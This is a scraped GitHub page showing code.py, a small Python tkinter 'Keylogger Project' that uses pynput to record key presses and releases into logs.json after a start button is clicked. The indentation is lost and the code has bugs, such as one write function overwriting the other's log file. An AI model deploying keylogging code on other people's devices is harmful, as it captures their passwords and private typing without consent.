-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathcode.py
More file actions
139 lines (52 loc) · 1.72 KB
/
code.py
File metadata and controls
139 lines (52 loc) · 1.72 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
import tkinter as tk
from tkinter import *
from pynput import keyboard
import json
root = tk.Tk()
root.geometry("250x300")
root.title("Keylogger Project")
key_list = []
x = False
key_strokes=""
def update_txt_file(key):
with open('logs.json' , '+w') as key_strokes:
key_strokes.write(key)
def update_json_file (key_list):
with open('logs.json' , '+wb') as key_log:
key_list_bytes = json.dumps(key_list).encode()
key_log.write(key_list_bytes)
def on_press(key) :
global x, key_list
if x == False:
key_list.append(
{'Pressed': f'{key}'}
)
x = True
if x == True:
key_list.append(
{'Held': f'{key}'}
)
update_json_file(key_list)
def on_release (key):
global x, key_list,key_strokes
key_list.append(
{'Released': '(key)'}
)
if x == True:
x = False
update_json_file(key_list)
key_strokes=key_strokes+str(key)
update_txt_file(str(key_strokes))
def butaction():
print("[+] Running Keylogger successfully!\n[!] Saving the key logs in ’logs.json'")
with keyboard.Listener(
on_press=on_press,
on_release=on_release) as listener:
listener.join()
empty = Label(root ,text=" ").grid(row=0,column=0)
empty = Label(root ,text=" ").grid(row=1,column=0)
empty = Label(root ,text=" ").grid(row=2,column=0)
empty = Label(root ,text="Keylogger Project", font='verdana 11 bold').grid(row=3,column=3)
empty = Label(root ,text=" ").grid(row=4,column=0)
Button(root, text="Start Keylogger", command =butaction).grid(row=5,column=3)
root.mainloop()